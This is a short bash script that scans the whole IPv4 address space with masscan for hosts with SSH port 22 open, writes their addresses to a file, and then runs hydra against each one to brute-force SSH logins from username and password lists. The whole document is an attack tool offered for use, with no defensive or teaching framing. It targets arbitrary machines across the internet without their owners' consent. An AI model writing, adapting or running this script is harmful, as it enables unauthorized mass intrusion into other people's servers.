#!/bin/bash

# Scan IPv4 range on port 22
masscan 0.0.0.0/0 -p22 --exclude 255.255.255.255 | awk '{print $6}' > result.txt

# Brute force
IFS=$'\n'
for ip in $(cat result.txt)
do

  hydra -l users.txt -P passwords.txt ssh://$ip

done

exit 0
